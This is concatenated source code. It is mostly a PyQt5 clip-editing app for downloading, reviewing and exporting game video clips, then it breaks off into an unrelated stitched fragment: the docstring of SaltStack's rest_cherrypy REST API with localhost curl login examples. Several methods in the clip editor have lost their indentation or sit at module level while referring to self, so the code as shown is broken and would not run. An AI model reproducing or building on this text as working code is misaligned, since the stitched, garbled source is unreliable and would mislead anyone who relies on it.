        os.startfile("Finished Videos")
        # options = QFileDialog.Options()
        # fileName, _ = QFileDialog.getOpenFileName(self,"Select The First Clip", f"Finished Videos/","All Files (*);;MP4 Files (*.mp4)", options=options)
class ClipDownloadMenu(QMainWindow):
    """Window for choosing a game and downloading clips for editing.

    When opened from an existing clipEditor, new clips are appended to that
    editor's script instead of opening a fresh editor.
    """
    update_progress_bar = pyqtSignal(int)  # per-clip download progress
    set_max_progres_bar = pyqtSignal(int)  # total clips to download
    finished_downloading = pyqtSignal(scriptwrapper.ScriptWrapper)  # result payload
    def __init__(self, clipEditorWindow = None):
        QtWidgets.QWidget.__init__(self)
        uic.loadUi(f"{current_path}/UI/clipDownload.ui", self)
        try:
            self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
        except Exception as e:
            # icon is cosmetic; ignore if the asset is missing
            pass
        self.progressBar.hide()
        self.addingToDBLabel.hide()
        self.downloadButton.clicked.connect(self.downloadClips)
        self.update_progress_bar.connect(self.updateProgressBar)
        self.set_max_progres_bar.connect(self.setMaxProgressBar)
        self.finished_downloading.connect(self.finishedDownloading)
        self.clipEditorWindow = clipEditorWindow
        self.populateGames()
    def populateGames(self):
        """Fill the game selector from the module-level `games` list."""
        self.games.clear()
        self.games.addItems(games)
    def downloadClips(self):
        #Getting all the necessary information for getting the clips
        self.downloadButton.hide()
        self.addingToDBLabel.show()
        self.progressBar.show()
        num_clips = str(self.clipNumCombo.currentText())
        game = str(self.games.currentText())
        already_scripts = None
        if self.clipEditorWindow is not None:
            # avoid re-downloading clips the open editor already has
            already_scripts = self.clipEditorWindow.videoWrapper.scriptWrapper.rawScript
        if already_scripts is None:
            Thread(target=client.requestClips, args=(game, num_clips, self)).start()
        else:
            Thread(target=client.requestClipsWithoutClips, args=(game, num_clips, already_scripts, self)).start()
    def setMaxProgressBar(self, number):
        self.progressBar.setMaximum(number)
    def updateProgressBar(self, downloadno):
        self.progressBar.setValue(downloadno)
    def finishedDownloading(self, newscriptwrapper):
        """Route downloaded clips to a new editor or the existing one.

        NOTE(review): self.close() runs twice on the success path, and the
        trailing mainMenuWindow.show() also runs after opening a new
        clipEditor — confirm both are intended.
        """
        if not len(newscriptwrapper.scriptMap) == 0:
            self.close()
            if self.clipEditorWindow is None:
                twitchvideo = scriptwrapper.TwitchVideo(newscriptwrapper)
                self.clipEditor = clipEditor(twitchvideo)
                self.clipEditor.show()
            else:
                self.clipEditorWindow.videoWrapper.scriptWrapper.addScriptWrapper(newscriptwrapper)
                self.clipEditorWindow.downloaded_more_scripts.emit()
        else:
            self.downloadFail("Failure")
        self.close()
        if self.clipEditorWindow is None:
            client.mainMenuWindow.show()
    def downloadFail(self, msg):
        buttonReply = QMessageBox.information(self, msg, 'No clips able to download. Please try with more clips', QMessageBox.Ok)
class ClipUploadMenu(QMainWindow):
    """Progress window shown while the final video is exported/uploaded."""
    update_progress_bar = pyqtSignal()     # advance progress by one step
    set_max_progres_bar = pyqtSignal(int)  # total number of steps
    finished_downloading = pyqtSignal()    # export complete
    def __init__(self, videowrapper, name):
        QtWidgets.QWidget.__init__(self)
        uic.loadUi(f"{current_path}/UI/clipUpload.ui", self)
        try:
            self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
        except Exception as e:
            # icon is cosmetic; ignore if the asset is missing
            pass
        self.update_progress_bar.connect(self.updateProgressBar)
        self.set_max_progres_bar.connect(self.setMaxProgressBar)
        self.finished_downloading.connect(self.finishedDownloading)
        # export runs on a background thread and reports back via signals
        Thread(target=client.exportVideo, args=(videowrapper, name, self)).start()
        self.i = 0  # steps completed so far
    def setMaxProgressBar(self, number):
        self.progressBar.setMaximum(number)
    def updateProgressBar(self):
        self.i += 1
        self.progressBar.setValue(self.i)
    def finishedDownloading(self):
        """Close this window and return to a fresh main menu."""
        self.close()
        self.mainMenu = MainMenu()
        self.mainMenu.show()
        client.mainMenuWindow = self.mainMenu
class clipEditor(QMainWindow):
    """Editor window: preview, reorder, keep/skip clips and pick intro/outro/interval."""
    downloaded_more_scripts = pyqtSignal()  # emitted when extra clips arrive
    def __init__(self, videoWrapper):
        QtWidgets.QWidget.__init__(self)
        uic.loadUi(f"{current_path}/UI/ClipEditor.ui", self)
        try:
            self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
        except Exception as e:
            # icon is cosmetic; ignore if the asset is missing
            pass
        #Variables and stuff for the editor to send to the video generator
        self.videoWrapper = videoWrapper
        self.mainCommentIndex = 0  # index of the clip currently selected
        self.populateTreeWidget()
        self.treeWidget.currentItemChanged.connect(self.setSelection)
        self.treeWidget.clicked.connect(self.setSelection)
        self.downloaded_more_scripts.connect(self.receiveMoreClips)
        # paths for the optional framing clips; validated on export
        self.introClipPath = None
        self.firstClipPath = None
        self.intervalClipPath = None
        self.outroClipPath = None
        self.keep = []
        #All of the stuff to make the clip editor work
        self.playlist = QMediaPlaylist()
        vid_path = QUrl.fromLocalFile(f'{current_path}/VideoFiles')
        self.mediaPlayer = QMediaPlayer()
        self.playPauseButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))
        #self.addClipsToPlaylist()
        self.mediaPlayer.stateChanged.connect(self.playPauseMedia)
        self.mediaPlayer.setVideoOutput(self.clipPlayer)
        self.mediaPlayer.setPlaylist(self.playlist)
        self.mediaPlayer.positionChanged.connect(self.positionChanged)
        self.mediaPlayer.durationChanged.connect(self.durationChanged)
        self.videoDurationSlider.sliderMoved.connect(self.setPosition)
        self.defaultIntro.stateChanged.connect(self.defaultIntroToggle)
        self.chooseFirstClip.clicked.connect(self.firstClipFileDialog)
        self.chooseIntro.clicked.connect(self.introFileDialog)
        self.chooseInterval.clicked.connect(self.intervalFileDialog)
        self.chooseOutro.clicked.connect(self.outroFileDialog)
        self.timer = QTimer(self, interval=1)
        self.timer.start()
        self.mediaPlayer.positionChanged.connect(self.vidTimeStamp)
        self.playPauseButton.clicked.connect(self.play)
        self.skipButton.clicked.connect(self.skipComment)
        self.downloadMore.clicked.connect(self.downloadMoreScripts)
        self.keepButton.clicked.connect(self.keepComment)
        self.exportButton.clicked.connect(self.videoExportConfirmation)
        self.moveDown.clicked.connect(self.moveClipDown)
        self.moveUp.clicked.connect(self.moveClipUp)
        #self.nextButton.clicked.connect(self.nextClip)
        self.playlist.currentIndexChanged.connect(self.checkForLastClip)
        # hide the chooser widgets for any framing clip the settings disable
        if settings.enforceInterval:
            self.loadDefaultInterval()
        else:
            self.chooseInterval.hide()
            self.defaultInterval.hide()
        if settings.enforceIntro:
            self.loadDefaultIntro()
        else:
            self.chooseIntro.hide()
            self.defaultIntro.hide()
        if settings.enforceOutro:
            self.loadDefaultOutro()
        else:
            self.chooseOutro.hide()
            self.defaultOutro.hide()
        if not settings.enforceFirstClip:
            self.chooseFirstClip.hide()
            self.firstClipCred.hide()
            self.firstClipNameLabel.hide()
        self.updateDisplay()
    def muteBackgroundVolume(self):
        """Zero out the background-volume text field."""
        self.backgroundVolume.setText("0")
    def defaultIntroToggle(self):
        # debug print of the checkbox state; no other effect here
        print(self.defaultIntro.isChecked())
    def receiveMoreClips(self):
        """Slot for downloaded_more_scripts: rebuild the clip tree."""
        self.populateTreeWidget()
    def downloadMoreScripts(self):
        """Open the download window bound to this editor for extra clips."""
        self.gameSelect = ClipDownloadMenu(self)
        self.gameSelect.show()
        pass
    def moveClipDown(self):
        # NOTE(review): "down" calls scriptWrapper.moveUp — confirm the
        # wrapper's naming is inverted relative to the UI, not a bug.
        self.videoWrapper.scriptWrapper.moveUp(self.mainCommentIndex)
        self.updateDisplay()
    def moveClipUp(self):
        # NOTE(review): "up" calls scriptWrapper.moveDown — see moveClipDown.
        self.videoWrapper.scriptWrapper.moveDown(self.mainCommentIndex)
        self.updateDisplay()
    def updateDisplay(self):
        """Refresh labels, stats and the media player for the selected clip."""
        #self.scriptWrapper.saveScriptWrapper()
        # highlight the currently selected tree item
        self.getCurrentWidget(self.mainCommentIndex).setForeground(0, QtGui.QBrush(QtGui.QColor("blue")))
        twitchclip = self.videoWrapper.scriptWrapper.getCommentInformation(self.mainCommentIndex)
        mp4file = twitchclip.mp4
        video_duration = twitchclip.vid_duration
        audio = twitchclip.audio
        self.clipTitle.setText(f'{twitchclip.author_name}-{twitchclip.clip_name}')
        self.likeCount.setText("Likes: %s" % twitchclip.diggCount)
        self.shareCount.setText("Shares: %s" % twitchclip.shareCount)
        self.playCount.setText("Plays: %s" % twitchclip.playCount)
        self.commentCount.setText("Comments: %s" % twitchclip.commentCount)
        self.updateClipDuration()
        self.mediaPlayer.stop()
        # paths with multiple components are user uploads (absolute paths);
        # otherwise the clip lives in TempClips/<name>.mp4
        if len(mp4file.split("/")) > 2:
            self.mediaPlayer.setMedia(QMediaContent(QUrl.fromLocalFile(f'{current_path}/{mp4file}')));
        else:
            self.mediaPlayer.setMedia(QMediaContent(QUrl.fromLocalFile(f'{current_path}/TempClips/{mp4file}.mp4')))
        self.mediaPlayer.setVolume(audio * 100)
        self.estTime.setText(str(self.videoWrapper.scriptWrapper.getEstimatedVideoTime()))
        self.videoLength.setText(f'{round(video_duration, 1)}')
        self.mediaPlayer.play()
        self.clipCountLabel.setText(f"Clip {self.mainCommentIndex+1}/{len(self.videoWrapper.scriptWrapper.rawScript)}")
    def setSelection(self):
        """Sync mainCommentIndex with the tree item the user clicked."""
        try:
            self.currentTreeWidget = self.treeWidget.currentItem()
            if self.currentTreeWidget.parent() is None:
                # top-level items are named "Vid <n>"; parse n back out
                self.mainCommentIndex = int(str(self.currentTreeWidget.text(0)).split(" ")[1])
                self.updateColors()
                self.updateDisplay()
        except Exception:
            # broad catch: selection events can fire with no/odd items
            print("error trying to update selection index")
    def getCurrentWidget(self, x):
        """Return the top-level tree item for clip index *x*."""
        return self.getTopLevelByName("Vid %s" % str(x))
    def incrimentSelection(self):
        """Advance the selection by one, clamped to the last clip."""
        if not self.mainCommentIndex + 1 > self.videoWrapper.scriptWrapper.getCommentAmount() - 1:
            self.mainCommentIndex += 1
    def updateColors(self):
        """Color tree items green (kept) or red (skipped) from the script map."""
        for x, mainComment in enumerate(self.videoWrapper.scriptWrapper.scriptMap):
            self.selectedMainComment = self.getTopLevelByName("Vid %s" % str(x))
            if mainComment is True:
                self.selectedMainComment.setForeground(0, QtGui.QBrush(QtGui.QColor("green")))
            else:
                self.selectedMainComment.setForeground(0, QtGui.QBrush(QtGui.QColor("red")))
    def keepComment(self):
        """Mark the current clip as kept and advance."""
        self.videoWrapper.scriptWrapper.keep(self.mainCommentIndex)
        self.incrimentSelection()
        self.updateColors()
        self.updateDisplay()
    def skipComment(self):
        """Mark the current clip as skipped and advance."""
        self.videoWrapper.scriptWrapper.skip(self.mainCommentIndex)
        self.updateColors()
        self.nextMainComment()
        self.updateDisplay()
def nextMainComment(self):
if not self.mainCommentIndex + 1 > self.videoWrapper.scriptWrapper.getCommentAmount() - 1:
self.mainCommentIndex += 1
self.selectedMainComment = self.getTopLevelByName("Main Comment %s" % str(self.mainCommentIndex))
    def populateTreeWidget(self):
        """Rebuild the tree with one "Vid <n>" item per clip in the script."""
        self.treeWidget.clear()
        for i, clip in enumerate(self.videoWrapper.scriptWrapper.rawScript):
            treeParentName = "Vid %s"%str(i)
            self.addTopLevel(treeParentName)
        self.selectedMainComment = self.getTopLevelByName("Vid %s" % str(0))
        self.updateColors()
    def getTopLevelByName(self, name):
        """Return the top-level tree item whose text matches *name*, else None."""
        for index in range(self.treeWidget.topLevelItemCount()):
            item = self.treeWidget.topLevelItem(index)
            if item.text(0) == name:
                return item
        return None
    def addTopLevel(self, name):
        """Add a top-level tree item, skipping duplicates."""
        if self.getTopLevelByName(name) is None:
            QTreeWidgetItem(self.treeWidget, [name])
    def checkForLastClip(self):
        # NOTE(review): self.startCut is never assigned in this class's
        # visible code — confirm where it is set before relying on this slot.
        if self.playlist.currentIndex() == len(self.startCut) - 1:
            self.playlist.setPlaybackMode(0)
    def updateClipDuration(self):
        # fetches the clip but currently displays nothing (label line disabled)
        twitchclip = self.videoWrapper.scriptWrapper.getCommentInformation(self.mainCommentIndex)
        #self.clipDurationLabel.setText(f'Clip Duration: {duration}')
    #Getting the timestamp for the video player
    def vidTimeStamp(self):
        # getPositionInSecs is defined outside this view — TODO confirm
        self.timeStamp.setText(f"00:{self.getPositionInSecs()}")
    #Controlling the play/pause of the videos, kinda obvious
    def playPauseMedia(self):
        if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
            self.playPauseButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPause))
        else:
            self.playPauseButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))
    #Giving the play button function
    def play(self):
        if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
            self.mediaPlayer.pause()
        else:
            self.mediaPlayer.play()
    #This makes the duration slider move with the video
    def positionChanged(self, position):
        self.videoDurationSlider.setValue(position)
    #Sets the range of each slider to the duration of each video
    def durationChanged(self, duration):
        self.videoDurationSlider.setRange(0, duration)
    #This is to control the position of the video in the media player so I can control the video with the duration slider
    def setPosition(self, position):
        self.mediaPlayer.setPosition(position)
        self.mediaPlayer.play()
def introFileDialog(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Select The Intro Clip", f"{current_path}/Intros","All Files (*);;MP4 Files (*.mp4)", options=options)
if fileName:
try:
vid = cv2.VideoCapture(fileName)
height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
if width != int(1920) or height != int(1080):
self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
else:
self.introClipPath = fileName
self.chooseIntro.setText("Reselect Intro")
except Exception as e:
self.uploadFail("Error occured uploading file \n %s" % (e))
    def outroFileDialog(self):
        """Pick an outro clip; accept it only if it is exactly 1920x1080."""
        options = QFileDialog.Options()
        fileName, _ = QFileDialog.getOpenFileName(self,"Select The Outro Clip", f"{current_path}/Outros","All Files (*);;MP4 Files (*.mp4)", options=options)
        if fileName:
            try:
                # probe the video's resolution with OpenCV before accepting it
                vid = cv2.VideoCapture(fileName)
                height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
                width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
                if int(width) != 1920 or int(height) != 1080:
                    self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
                else:
                    self.outroClipPath = fileName
                    self.chooseOutro.setText("Reselect Outro")
            except Exception as e:
                self.uploadFail("Error occured uploading file \n %s" % (e))
    def intervalFileDialog(self):
        """Pick an interval clip; accept it only if it is exactly 1920x1080."""
        options = QFileDialog.Options()
        fileName, _ = QFileDialog.getOpenFileName(self,"Select The Interval Clip", f"{current_path}/Intervals","All Files (*);;MP4 Files (*.mp4)", options=options)
        if fileName:
            try:
                # probe the video's resolution with OpenCV before accepting it
                vid = cv2.VideoCapture(fileName)
                height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
                width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
                if int(width) != 1920 or int(height) != 1080:
                    self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
                else:
                    self.intervalClipPath = fileName
                    self.chooseInterval.setText("Reselect Interval")
            except Exception as e:
                self.uploadFail("Error occured uploading file \n %s" % (e))
    def firstClipFileDialog(self):
        """Pick a 1920x1080 first clip and insert it at the start of the script."""
        options = QFileDialog.Options()
        fileName, _ = QFileDialog.getOpenFileName(self,"Select The First Clip", f"{current_path}/FirstClips","All Files (*);;MP4 Files (*.mp4)", options=options)
        if fileName:
            # name = len(fileName.split("/"))
            # self.firstClipPath = (fileName.split("/")[name-1])
            try:
                # probe the video's resolution with OpenCV before accepting it
                vid = cv2.VideoCapture(fileName)
                height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT)
                width = vid.get(cv2.CAP_PROP_FRAME_WIDTH)
                if int(width) != 1920 or int(height) != 1080:
                    self.uploadFail("Incorrect resolution for file %s.\n Resolution was %sx%s, required 1920x1080" % (fileName, width, height))
                else:
                    self.firstClipPath = fileName
                    # use the file's base name (without .mp4) as the credit text
                    name = len(self.firstClipPath.split("/"))
                    new_name = (self.firstClipPath.split("/")[name-1]).replace(".mp4", "")
                    self.firstClipCred.setText(new_name)
                    # wrap the chosen file as a clip and prepend it to the script
                    firstClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", "", "", None, 0, 0, 0, 0)
                    firstClip.author_name = new_name
                    firstClip.mp4 = self.firstClipPath
                    firstClip.upload = True
                    # duration comes from the container metadata, in ms
                    media_info = MediaInfo.parse(self.firstClipPath)
                    duration = media_info.tracks[0].duration / 1000
                    firstClip.vid_duration = float(duration)
                    self.videoWrapper.scriptWrapper.addClipAtStart(firstClip)
                    self.populateTreeWidget()
                    self.chooseFirstClip.setText("Reselect First Clip")
            except Exception as e:
                self.uploadFail("Error occured uploading file \n %s" % (e))
    def saveDefaultIntro(self):
        # NOTE: intro persists the whole clip object (loader reads .mp4),
        # while interval/outro persist just the path — asymmetric on purpose?
        with open(f'Save Data/defaultintro.save', 'wb') as pickle_file:
            pickle.dump(self.introClip, pickle_file)
    def saveDefaultInterval(self):
        """Persist the current interval clip path."""
        with open(f'Save Data/defaultinterval.save', 'wb') as pickle_file:
            pickle.dump(self.intervalClipPath, pickle_file)
    def saveDefaultOutro(self):
        """Persist the current outro clip path."""
        with open(f'Save Data/defaultoutro.save', 'wb') as pickle_file:
            pickle.dump(self.outroClipPath, pickle_file)
    def loadDefaultIntro(self):
        """Restore the saved intro clip object, if one was saved."""
        if os.path.exists("Save Data/defaultintro.save"):
            with open(f'Save Data/defaultintro.save', 'rb') as pickle_file:
                self.introClip = pickle.load(pickle_file)
                self.introClipPath = self.introClip.mp4
                self.defaultIntro.setChecked(True)
                self.chooseIntro.setText("Reselect Intro")
    def loadDefaultInterval(self):
        """Restore the saved interval clip path, if one was saved."""
        if os.path.exists("Save Data/defaultinterval.save"):
            with open(f'Save Data/defaultinterval.save', 'rb') as pickle_file:
                self.intervalClip = pickle.load(pickle_file)
                self.intervalClipPath = self.intervalClip
                self.defaultInterval.setChecked(True)
                self.chooseInterval.setText("Reselect Interval")
    def loadDefaultOutro(self):
        """Restore the saved outro clip path, if one was saved."""
        if os.path.exists("Save Data/defaultoutro.save"):
            with open(f'Save Data/defaultoutro.save', 'rb') as pickle_file:
                self.outroClip = pickle.load(pickle_file)
                self.outroClipPath = self.outroClip
                self.defaultOutro.setChecked(True)
                self.chooseOutro.setText("Reselect Outro")
#Collecting all of the information for video generator
def exportVideo(self):
    """Build the final clip sequence and open the upload menu.

    Wraps the selected intro/interval/outro files into clip objects (reading
    durations from the files via pymediainfo), saves them as defaults if the
    corresponding checkboxes are ticked, stitches them around the kept clips,
    and hands the result to ClipUploadMenu. Prints a message to the console
    when a required clip is missing.
    """
    # A check passes when the clip is selected OR the config does not
    # require that clip type at all (enforce* flags from settings).
    intervalCheck = True if (self.intervalClipPath is not None and settings.enforceInterval) or not settings.enforceInterval else False
    firstClipCheck = True if (self.firstClipPath is not None and settings.enforceFirstClip) or not settings.enforceFirstClip else False
    introClipCheck = True if (self.introClipPath is not None and settings.enforceIntro) or not settings.enforceIntro else False
    outroClipCheck = True if (self.outroClipPath is not None and settings.enforceOutro) or not settings.enforceOutro else False
    if intervalCheck is True and firstClipCheck is True and introClipCheck is True and outroClipCheck is True:
        self.mediaPlayer.stop()
        final_clips = self.videoWrapper.scriptWrapper.getFinalClips()
        with_intro = []
        if settings.enforceIntro:
            # Wrap the raw intro file in a clip object; duration comes from
            # the file itself (pymediainfo reports milliseconds).
            self.introClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", " ", "", None, 0, 0, 0, 0)
            self.introClip.author_name = None
            self.introClip.mp4 = self.introClipPath
            self.introClip.isIntro = True
            self.introClip.isInterval = False
            self.introClip.upload = True
            self.introClip.isUsed = True
            media_info_intro = MediaInfo.parse(self.introClipPath)
            duration_intro = media_info_intro.tracks[0].duration / 1000
            self.introClip.vid_duration = float(duration_intro)
        if settings.enforceInterval:
            # Same wrapping for the interval clip.
            self.intervalClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", " ", "", None, 0, 0, 0, 0)
            self.intervalClip.author_name = None
            self.intervalClip.mp4 = self.intervalClipPath
            self.intervalClip.isInterval = True
            self.intervalClip.isIntro = False
            self.intervalClip.upload = True
            self.intervalClip.isUsed = True
            media_info_interval = MediaInfo.parse(self.intervalClipPath)
            duration_interval = media_info_interval.tracks[0].duration / 1000
            self.intervalClip.vid_duration = float(duration_interval)
        if settings.enforceOutro:
            # Same wrapping for the outro clip.
            self.outroClip = scriptwrapper.DownloadedTwitchClipWrapper("", "", " ", "", None, 0, 0, 0, 0)
            self.outroClip.author_name = None
            self.outroClip.mp4 = self.outroClipPath
            self.outroClip.isOutro = True
            self.outroClip.upload = True
            self.outroClip.isUsed = True
            media_info_outro = MediaInfo.parse(self.outroClipPath)
            duration_outro = media_info_outro.tracks[0].duration / 1000
            self.outroClip.vid_duration = float(duration_outro)
        # Persist defaults when the corresponding checkboxes are ticked.
        if self.defaultIntro.isChecked():
            self.saveDefaultIntro()
        if self.defaultInterval.isChecked():
            self.saveDefaultInterval()
        if self.defaultOutro.isChecked():
            self.saveDefaultOutro()
        for i, clip in enumerate(final_clips):
            with_intro.append(clip)
            if i == 0:
                # NOTE(review): indentation reconstructed -- this reads as
                # "hook clip first, then interval, then intro"; confirm the
                # intended intro/interval placement against the original file.
                if settings.enforceInterval:
                    with_intro.append(self.intervalClip)
                if settings.enforceIntro:
                    with_intro.append(self.introClip)
        if settings.enforceOutro:
            with_intro.append(self.outroClip)
        self.videoWrapper.final_clips = with_intro
        self.clipupload = ClipUploadMenu(self.videoWrapper, self.videoName.text())
        self.clipupload.show()
    else:
        print("Choose intro clip and first clip")
#Converting the video duration/position to seconds so it makes sense
def getPositionInSecs(self):
    """Map the media player's playback position into the current clip.

    Scales the player's position/duration ratio onto the duration of the
    clip associated with the currently selected comment.

    Returns:
        int | None: position in whole seconds, or None when the player is
        not ready (zero/unknown duration) or any lookup fails.
    """
    try:
        vid_position = self.mediaPlayer.position()
        vid_duration = self.mediaPlayer.duration()
        if not vid_duration:
            # Guard: duration is 0 before media is loaded; previously this
            # raised ZeroDivisionError which a bare `except` swallowed.
            return None
        vid_percentage = vid_position / vid_duration
        twitchclip = self.videoWrapper.scriptWrapper.getCommentInformation(self.mainCommentIndex)
        return int(twitchclip.vid_duration * vid_percentage)
    except Exception:
        # Was a bare `except: pass`: that also swallowed KeyboardInterrupt
        # and SystemExit. Narrowed, and the None result is now explicit.
        return None
def videoExportConfirmation(self):
    """Ask the user to confirm export, validate preconditions, then export.

    On Yes: re-checks every enforce* requirement and the minimum clip count;
    shows a publishFail dialog listing every unmet requirement, otherwise
    stops playback, closes this window and calls exportVideo().
    On Cancel: does nothing beyond a console message.
    """
    msg = 'Is the video long enough?\nIs everything properly cut?'
    buttonReply = QMessageBox.information(self, 'Video Export Confirmation', msg, QMessageBox.Yes | QMessageBox.Cancel, QMessageBox.Cancel)
    if buttonReply == QMessageBox.Yes:
        # Same pass/fail logic as exportVideo: a check passes when the clip
        # is selected or the config does not require it.
        intervalCheck = True if (self.intervalClipPath is not None and settings.enforceInterval) or not settings.enforceInterval else False
        firstClipCheck = True if (self.firstClipPath is not None and settings.enforceFirstClip) or not settings.enforceFirstClip else False
        introClipCheck = True if (self.introClipPath is not None and settings.enforceIntro) or not settings.enforceIntro else False
        outroClipCheck = True if (self.outroClipPath is not None and settings.enforceOutro) or not settings.enforceOutro else False
        # Accumulate one message listing every unmet requirement.
        msg = "Could not publish due to the following reasons: \n"
        if not intervalCheck:
            msg += "No interval selected, but interval expected (see config.ini)\n"
        if not firstClipCheck:
            msg += "No first clip selected, but first clip expected (see config.ini)\n"
        if not introClipCheck:
            msg += "No intro clip selected, but intro expected (see config.ini)\n"
        if not outroClipCheck:
            msg += "No outro clip selected, but outro expected (see config.ini)\n"
        amountClips = len(self.videoWrapper.scriptWrapper.getKeptClips())
        if amountClips < 2:
            msg += "Not enough clips! Need at least two clips to be kept."
        if intervalCheck is False or firstClipCheck is False or introClipCheck is False or outroClipCheck is False or amountClips < 2:
            self.publishFail(msg)
            return
        self.mediaPlayer.stop()
        self.close()
        self.exportVideo()
        print('Yes clicked.')
    if buttonReply == QMessageBox.Cancel:
        print('Cancel')
def uploadFail(self, msg):
    """Show a modal information dialog reporting a failed upload."""
    # The clicked button is irrelevant here; the dialog is purely informative.
    QMessageBox.information(self, 'Upload fail', msg, QMessageBox.Ok)
def publishFail(self, msg):
    """Show a modal information dialog reporting why publishing failed."""
    # The clicked button is irrelevant here; the dialog is purely informative.
    QMessageBox.information(self, 'Publish fail', msg, QMessageBox.Ok)
|
app.py | # encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://github.com/cherrypy/cherrypy/issues/1298>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
